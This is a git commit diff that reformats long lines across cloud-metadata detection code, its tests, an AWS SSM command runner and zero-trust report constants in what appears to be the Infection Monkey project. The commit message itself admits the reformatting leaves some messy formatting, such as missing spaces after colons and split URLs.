All E501 errors fixed, but formatting screwed up

Authored by VakarisZ on 2021-04-07 11:11:09 +03:00; committed by Mike Salvatore
Parent: ad2b2f88f5
Commit: 03bcfc97af
361 changed files with 6078 additions and 5521 deletions

View File

@ -33,7 +33,8 @@ class PerformanceAnalyzer(Analyzer):
if self.performance_test_config.break_on_timeout and not performance_is_good_enough:
LOGGER.warning(
"Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done "
"Calling breakpoint - pausing to enable investigation of island. "
"Type 'c' to continue once you're done "
"investigating. Type 'p timings' and 'p total_time' to see performance information."
)
breakpoint()
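
The hunk above shortens an over-long warning by splitting it into adjacent string literals, which Python concatenates at compile time, so the logged text is unchanged. A minimal sketch of the same pattern:

import logging

LOGGER = logging.getLogger(__name__)

# Adjacent literals inside the call's parentheses are joined into one string
# before the call runs, so wrapping this way never alters the message.
LOGGER.warning(
    "Calling breakpoint - pausing to enable investigation of island. "
    "Type 'c' to continue once you're done investigating. "
    "Type 'p timings' and 'p total_time' to see performance information."
)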

View File

@ -1,6 +1,7 @@
import random
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
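
A dotted module path in a from ... import statement cannot be wrapped in parentheses, which is presumably why the hunk above falls back to a backslash continuation. One line-length-safe alternative (a sketch, not what this commit does) keeps the path as adjacent string literals and loads the module with importlib; the path is the project's own, the binding names are illustrative:

import importlib

# Split the long dotted path across adjacent string literals instead of a
# backslash continuation; importlib joins and imports it at runtime.
fake_ip_generator = importlib.import_module(
    "envs.monkey_zoo.blackbox.tests.performance"
    ".telem_sample_parsing.sample_multiplier.fake_ip_generator"
)
FakeIpGenerator = fake_ip_generator.FakeIpGenerator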

View File

@ -9,10 +9,12 @@ from tqdm import tqdm
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
SampleFileParser,
)
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_monkey import (
FakeMonkey,
)

View File

@ -1,6 +1,7 @@
from unittest import TestCase
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)

View File

@ -9,7 +9,6 @@ from common.cloud.instance import CloudInstance
__author__ = "itay.mizeretz"
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
ACCOUNT_ID_KEY = "accountId"
@ -49,7 +48,8 @@ class AwsInstance(CloudInstance):
try:
self.account_id = self._extract_account_id(
requests.get(
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document",
timeout=2
).text
)
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
@ -60,7 +60,8 @@ class AwsInstance(CloudInstance):
@staticmethod
def _parse_region(region_url_response):
# For a list of regions, see:
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts
# .RegionsAndAvailabilityZones.html
# This regex will find any AWS region format string in the response.
re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
@ -79,9 +80,11 @@ class AwsInstance(CloudInstance):
def _extract_account_id(instance_identity_document_response):
"""
Extracts the account id from the dynamic/instance-identity/document metadata path.
Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more solutions,
Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more
solutions,
in case Amazon break this mechanism.
:param instance_identity_document_response: json returned via the web page ../dynamic/instance-identity/document
:param instance_identity_document_response: json returned via the web page
../dynamic/instance-identity/document
:return: The account id
"""
return json.loads(instance_identity_document_response)[ACCOUNT_ID_KEY]
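
One side effect visible in the region-parsing hunk above is that the documentation URL was broken in the middle of its path, so it can no longer be followed or copied. Long URLs in comments are commonly left on one line and exempted from the length check instead. A sketch of that convention; the regex comes from the hunk above, the helper and constant names are illustrative:

import re

# For a list of regions, see:
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html  # noqa: E501
AWS_REGION_REGEX = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"


def parse_region(region_url_response):
    # Returns the first AWS region name found in the response, or None.
    finding = re.findall(AWS_REGION_REGEX, region_url_response, re.IGNORECASE)
    return finding[0] if finding else None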

View File

@ -20,10 +20,10 @@ logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response):
return [
{
"instance_id": x[INSTANCE_ID_KEY],
"name": x[COMPUTER_NAME_KEY],
"os": x[PLATFORM_TYPE_KEY].lower(),
"ip_address": x[IP_ADDRESS_KEY],
"instance_id":x[INSTANCE_ID_KEY],
"name":x[COMPUTER_NAME_KEY],
"os":x[PLATFORM_TYPE_KEY].lower(),
"ip_address":x[IP_ADDRESS_KEY],
}
for x in response[INSTANCE_INFORMATION_LIST_KEY]
]
@ -31,12 +31,14 @@ def filter_instance_data_from_aws_response(response):
class AwsService(object):
"""
A wrapper class around the boto3 client and session modules, which supplies various AWS services.
A wrapper class around the boto3 client and session modules, which supplies various AWS
services.
This class will assume:
1. That it's running on an EC2 instance
2. That the instance is associated with the correct IAM role. See
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role
for details.
"""
region = None
@ -73,7 +75,8 @@ class AwsService(object):
Get the information for all instances with the relevant roles.
This function will assume that it's running on an EC2 instance with the correct IAM role.
See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam
-role for details.
:raises: botocore.exceptions.ClientError if can't describe local instance information.
:return: All visible instances from this instance
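
The dictionary hunk above is the "formatting screwed up" the commit title admits to: the space after each ':' was dropped, which flake8 reports as E231 (missing whitespace after ':'). A sketch of the same comprehension with PEP 8 spacing; the *_KEY constants are stand-ins defined only so the snippet runs on its own:

# Stand-in key constants so the sketch is self-contained; the real values come
# from the module's imports.
INSTANCE_ID_KEY = "InstanceId"
COMPUTER_NAME_KEY = "ComputerName"
PLATFORM_TYPE_KEY = "PlatformType"
IP_ADDRESS_KEY = "IPAddress"
INSTANCE_INFORMATION_LIST_KEY = "InstanceInformationList"


def filter_instance_data_from_aws_response(response):
    return [
        {
            "instance_id": x[INSTANCE_ID_KEY],
            "name": x[COMPUTER_NAME_KEY],
            "os": x[PLATFORM_TYPE_KEY].lower(),
            "ip_address": x[IP_ADDRESS_KEY],
        }
        for x in response[INSTANCE_INFORMATION_LIST_KEY]
    ]

A formatter such as black restores exactly this spacing automatically.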

View File

@ -30,7 +30,6 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
}
"""
EXPECTED_INSTANCE_ID = "i-1234567890abcdef0"
EXPECTED_REGION = "us-west-2"
@ -39,8 +38,8 @@ EXPECTED_ACCOUNT_ID = "123456789012"
def get_test_aws_instance(
text={"instance_id": None, "region": None, "account_id": None},
exception={"instance_id": None, "region": None, "account_id": None},
text={"instance_id":None, "region":None, "account_id":None},
exception={"instance_id":None, "region":None, "account_id":None},
):
with requests_mock.Mocker() as m:
# request made to get instance_id
@ -68,9 +67,9 @@ def get_test_aws_instance(
def good_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}
)
@ -100,9 +99,9 @@ def test_get_account_id_good_data(good_data_mock_instance):
def bad_region_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": "in-a-different-world",
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id":INSTANCE_ID_RESPONSE,
"region":"in-a-different-world",
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}
)
@ -132,9 +131,9 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
def bad_account_id_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": "who-am-i",
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":"who-am-i",
}
)
@ -164,11 +163,11 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
def bad_instance_id_request_mock_instance(instance_id_exception):
return get_test_aws_instance(
text={
"instance_id": None,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id":None,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
},
exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
exception={"instance_id":instance_id_exception, "region":None, "account_id":None},
)
@ -202,11 +201,11 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
def bad_region_request_mock_instance(region_exception):
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": None,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id":INSTANCE_ID_RESPONSE,
"region":None,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
},
exception={"instance_id": None, "region": region_exception, "account_id": None},
exception={"instance_id":None, "region":region_exception, "account_id":None},
)
@ -240,11 +239,11 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
def bad_account_id_request_mock_instance(account_id_exception):
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": None,
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":None,
},
exception={"instance_id": None, "region": None, "account_id": account_id_exception},
exception={"instance_id":None, "region":None, "account_id":account_id_exception},
)

View File

@ -54,5 +54,5 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
)
self.assertEqual(
filter_instance_data_from_aws_response(json.loads(json_response_full)),
[{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
[{"instance_id":"string", "ip_address":"string", "name":"string", "os":"string"}],
)

View File

@ -9,7 +9,8 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = (
"http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
"http://169.254.169.254/metadata/instance?api-version=%s" %
LATEST_AZURE_METADATA_API_VERSION
)
logger = logging.getLogger(__name__)
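
The wrap above ends a line on the % operator. PEP 8 now prefers breaking before binary operators (pycodestyle can flag the break-after form as W504, though W503 and W504 are both off by default), and an f-string sidesteps the operator entirely. A sketch of that alternative:

LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"

# Adjacent literals again: only the piece with a placeholder needs the f prefix.
AZURE_METADATA_SERVICE_URL = (
    "http://169.254.169.254/metadata/instance"
    f"?api-version={LATEST_AZURE_METADATA_API_VERSION}"
)
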
@ -18,7 +19,8 @@ logger = logging.getLogger(__name__)
class AzureInstance(CloudInstance):
"""
Access to useful information about the current machine if it's an Azure VM.
Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
Based on Azure metadata service:
https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
"""
def is_instance(self):
@ -39,12 +41,13 @@ class AzureInstance(CloudInstance):
try:
response = requests.get(
AZURE_METADATA_SERVICE_URL,
headers={"Metadata": "true"},
headers={"Metadata":"true"},
timeout=SHORT_REQUEST_TIMEOUT,
)
# If not on cloud, the metadata URL is non-routable and the connection will fail.
# If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
# If on AWS, should get 404 since the metadata service URL is different,
# so bool(response) will be false.
if response:
logger.debug("Trying to parse Azure metadata.")
self.try_parse_response(response)
@ -52,7 +55,8 @@ class AzureInstance(CloudInstance):
logger.warning(f"Metadata response not ok: {response.status_code}")
except requests.RequestException:
logger.debug(
"Failed to get response from Azure metadata service: This instance is not on Azure."
"Failed to get response from Azure metadata service: This instance is not on "
"Azure."
)
def try_parse_response(self, response):

View File

@ -7,108 +7,113 @@ from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureI
from common.cloud.environment_names import Environment
GOOD_DATA = {
"compute": {
"azEnvironment": "AZUREPUBLICCLOUD",
"isHostCompatibilityLayerVm": "true",
"licenseType": "Windows_Client",
"location": "westus",
"name": "examplevmname",
"offer": "Windows",
"osProfile": {
"adminUsername": "admin",
"computerName": "examplevmname",
"disablePasswordAuthentication": "true",
"compute":{
"azEnvironment":"AZUREPUBLICCLOUD",
"isHostCompatibilityLayerVm":"true",
"licenseType":"Windows_Client",
"location":"westus",
"name":"examplevmname",
"offer":"Windows",
"osProfile":{
"adminUsername":"admin",
"computerName":"examplevmname",
"disablePasswordAuthentication":"true",
},
"osType": "linux",
"placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
"plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
"platformFaultDomain": "36",
"platformUpdateDomain": "42",
"publicKeys": [
{"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
{"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
"osType":"linux",
"placementGroupId":"f67c14ab-e92c-408c-ae2d-da15866ec79a",
"plan":{"name":"planName", "product":"planProduct", "publisher":"planPublisher"},
"platformFaultDomain":"36",
"platformUpdateDomain":"42",
"publicKeys":[
{"keyData":"ssh-rsa 0", "path":"/home/user/.ssh/authorized_keys0"},
{"keyData":"ssh-rsa 1", "path":"/home/user/.ssh/authorized_keys1"},
],
"publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName": "macikgo-test-may-23",
"resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/"
"publisher":"RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName":"macikgo-test-may-23",
"resourceId":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
"-may-23/"
"providers/Microsoft.Compute/virtualMachines/examplevmname",
"securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
"sku": "Windows-Server-2012-R2-Datacenter",
"storageProfile": {
"dataDisks": [
"securityProfile":{"secureBootEnabled":"true", "virtualTpmEnabled":"false"},
"sku":"Windows-Server-2012-R2-Datacenter",
"storageProfile":{
"dataDisks":[
{
"caching": "None",
"createOption": "Empty",
"diskSizeGB": "1024",
"image": {"uri": ""},
"lun": "0",
"managedDisk": {
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"caching":"None",
"createOption":"Empty",
"diskSizeGB":"1024",
"image":{"uri":""},
"lun":"0",
"managedDisk":{
"id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampledatadiskname",
"storageAccountType": "Standard_LRS",
"storageAccountType":"Standard_LRS",
},
"name": "exampledatadiskname",
"vhd": {"uri": ""},
"writeAcceleratorEnabled": "false",
"name":"exampledatadiskname",
"vhd":{"uri":""},
"writeAcceleratorEnabled":"false",
}
],
"imageReference": {
"id": "",
"offer": "UbuntuServer",
"publisher": "Canonical",
"sku": "16.04.0-LTS",
"version": "latest",
"imageReference":{
"id":"",
"offer":"UbuntuServer",
"publisher":"Canonical",
"sku":"16.04.0-LTS",
"version":"latest",
},
"osDisk": {
"caching": "ReadWrite",
"createOption": "FromImage",
"diskSizeGB": "30",
"diffDiskSettings": {"option": "Local"},
"encryptionSettings": {"enabled": "false"},
"image": {"uri": ""},
"managedDisk": {
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"osDisk":{
"caching":"ReadWrite",
"createOption":"FromImage",
"diskSizeGB":"30",
"diffDiskSettings":{"option":"Local"},
"encryptionSettings":{"enabled":"false"},
"image":{"uri":""},
"managedDisk":{
"id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampleosdiskname",
"storageAccountType": "Standard_LRS",
"storageAccountType":"Standard_LRS",
},
"name": "exampleosdiskname",
"osType": "Linux",
"vhd": {"uri": ""},
"writeAcceleratorEnabled": "false",
"name":"exampleosdiskname",
"osType":"Linux",
"vhd":{"uri":""},
"writeAcceleratorEnabled":"false",
},
},
"subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
"tags": "baz:bash;foo:bar",
"version": "15.05.22",
"vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
"vmScaleSetName": "crpteste9vflji9",
"vmSize": "Standard_A3",
"zone": "",
"subscriptionId":"xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
"tags":"baz:bash;foo:bar",
"version":"15.05.22",
"vmId":"02aab8a4-74ef-476e-8182-f6d2ba4166a6",
"vmScaleSetName":"crpteste9vflji9",
"vmSize":"Standard_A3",
"zone":"",
},
"network": {
"interface": [
"network":{
"interface":[
{
"ipv4": {
"ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
"subnet": [{"address": "10.144.133.128", "prefix": "26"}],
"ipv4":{
"ipAddress":[{"privateIpAddress":"10.144.133.132", "publicIpAddress":""}],
"subnet":[{"address":"10.144.133.128", "prefix":"26"}],
},
"ipv6": {"ipAddress": []},
"macAddress": "0011AAFFBB22",
"ipv6":{"ipAddress":[]},
"macAddress":"0011AAFFBB22",
}
]
},
}
BAD_DATA_NOT_JSON = (
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
'"http://www.w3.org/TR/xhtml1/DTD/\
xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta '
'content="text/html; charset=utf-8" \
http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" '
"/>\n<title>Waiting...</title>\n<script type=\"text/\
javascript\">\nvar pageName = '/';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> "
"</body>\n</html>\n"
)
BAD_DATA_NOT_JSON = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/\
xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta content="text/html; charset=utf-8" \
http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" />\n<title>Waiting...</title>\n<script type="text/\
javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> </body>\n</html>\n'
BAD_DATA_JSON = {"": ""}
BAD_DATA_JSON = {"":""}
def get_test_azure_instance(url, **kwargs):
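
The old BAD_DATA_NOT_JSON above was wrapped with backslashes inside the string literal, and the rewritten version still keeps some of them. A backslash-newline inside a string splices the physical lines without adding a newline, but any indentation at the start of the continuation line becomes part of the value, which is why adjacent literals inside parentheses are the safer wrap. A small sketch of the difference:

# The continuation line is indented by four spaces, and those spaces end up
# inside the string.
with_backslash = "line one \
    line two"

# Adjacent literals concatenate exactly as written, indentation excluded.
with_adjacent = (
    "line one "
    "line two"
)

assert with_backslash == "line one " + "    " + "line two"
assert with_adjacent == "line one line two"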

View File

@ -8,13 +8,13 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
logger = logging.getLogger(__name__)
GCP_METADATA_SERVICE_URL = "http://metadata.google.internal/"
class GcpInstance(CloudInstance):
"""
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving
-metadata#runninggce
"""
def is_instance(self):

View File

@ -20,7 +20,8 @@ class AwsCmdResult(CmdResult):
@staticmethod
def is_successful(command_info, is_timeout=False):
"""
Determines whether the command was successful. If it timed out and was still in progress, we assume it worked.
Determines whether the command was successful. If it timed out and was still in progress,
we assume it worked.
:param command_info: Command info struct (returned by ssm.get_command_invocation)
:param is_timeout: Whether the given command timed out
:return: True if successful, False otherwise.

View File

@ -39,7 +39,7 @@ class AwsCmdRunner(CmdRunner):
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
command_res = self.ssm.send_command(
DocumentName=doc_name,
Parameters={"commands": [command_line]},
Parameters={"commands":[command_line]},
InstanceIds=[self.instance_id],
)
return command_res["Command"]["CommandId"]

View File

@ -21,8 +21,10 @@ class CmdRunner(object):
* command id - any unique identifier of a command which was already run
* command result - represents the result of running a command. Always of type CmdResult
* command status - represents the current status of a command. Always of type CmdStatus
* command info - Any consistent structure representing additional information of a command which was already run
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id' as a field
* command info - Any consistent structure representing additional information of a command
which was already run
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id'
as a field
* instance_id - any unique identifier of an instance (machine). Can be of any format
"""
@ -49,7 +51,8 @@ class CmdRunner(object):
"""
Run multiple commands on various instances
:param instances: List of instances.
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously and returns Cmd
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously
and returns Cmd
:param inst_n_cmd_res_to_res: Function which receives an instance and CmdResult
and returns a parsed result (of any format)
:return: Dictionary with 'instance_id' as key and parsed result as value

View File

@ -1,8 +1,10 @@
"""
This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
This file contains all the static data relating to Zero Trust. It is mostly used in the zero
trust report generation and
in creating findings.
This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
This file contains static mappings between zero trust components such as: pillars, principles,
tests, statuses.
Some of the mappings are computed when this module is loaded.
"""
@ -79,17 +81,24 @@ PRINCIPLE_DISASTER_RECOVERY = "data_backup"
PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication"
PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging"
PRINCIPLES = {
PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint security solutions.",
PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory "
PRINCIPLE_SEGMENTATION:"Apply segmentation and micro-segmentation inside your "
""
""
"network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC:"Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR:"Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY:"Use anti-virus and other traditional endpoint "
"security solutions.",
PRINCIPLE_DATA_CONFIDENTIALITY:"Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES:"Configure network policies to be as restrictive as "
"possible.",
PRINCIPLE_USERS_MAC_POLICIES:"Users' permissions to the network and to resources "
"should be MAC (Mandatory "
"Access Control) only.",
PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.",
PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
PRINCIPLE_DISASTER_RECOVERY:"Ensure data and infrastructure backups for disaster "
"recovery scenarios.",
PRINCIPLE_SECURE_AUTHENTICATION:"Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING:"Ensure monitoring and logging in network resources.",
}
POSSIBLE_STATUSES_KEY = "possible_statuses"
@ -98,184 +107,206 @@ PRINCIPLE_KEY = "principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = {
TEST_SEGMENTATION: {
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
TEST_SEGMENTATION:{
TEST_EXPLANATION_KEY:"The Monkey tried to scan and find machines that it can "
"communicate with from the machine it's "
"running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey performed cross-segment communication. Check firewall rules and"
" logs.",
STATUS_PASSED:"Monkey couldn't perform cross-segment communication. If relevant, "
"check firewall logs.",
},
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
PRINCIPLE_KEY:PRINCIPLE_SEGMENTATION,
PILLARS_KEY:[NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
},
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
TEST_MALICIOUS_ACTIVITY_TIMELINE:{
TEST_EXPLANATION_KEY:"The Monkeys in the network performed malicious-looking "
"actions, like scanning and attempting "
"exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY:"Monkey performed malicious actions in the network. Check SOC logs and "
"alerts."
},
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
PRINCIPLE_KEY:PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_ENDPOINT_SECURITY_EXISTS: {
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
TEST_ENDPOINT_SECURITY_EXISTS:{
TEST_EXPLANATION_KEY:"The Monkey checked if there is an active process of an "
"endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey didn't find ANY active endpoint security processes. Install and "
"activate anti-virus "
"software on endpoints.",
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
STATUS_PASSED:"Monkey found active endpoint security processes. Check their logs to "
"see if Monkey was a "
"security concern. ",
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY:[DEVICES],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_MACHINE_EXPLOITED: {
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
TEST_MACHINE_EXPLOITED:{
TEST_EXPLANATION_KEY:"The Monkey tries to exploit machines in order to "
"breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
"activity recognized and see "
"which endpoints were compromised.",
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
STATUS_PASSED:"Monkey didn't manage to exploit an endpoint.",
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
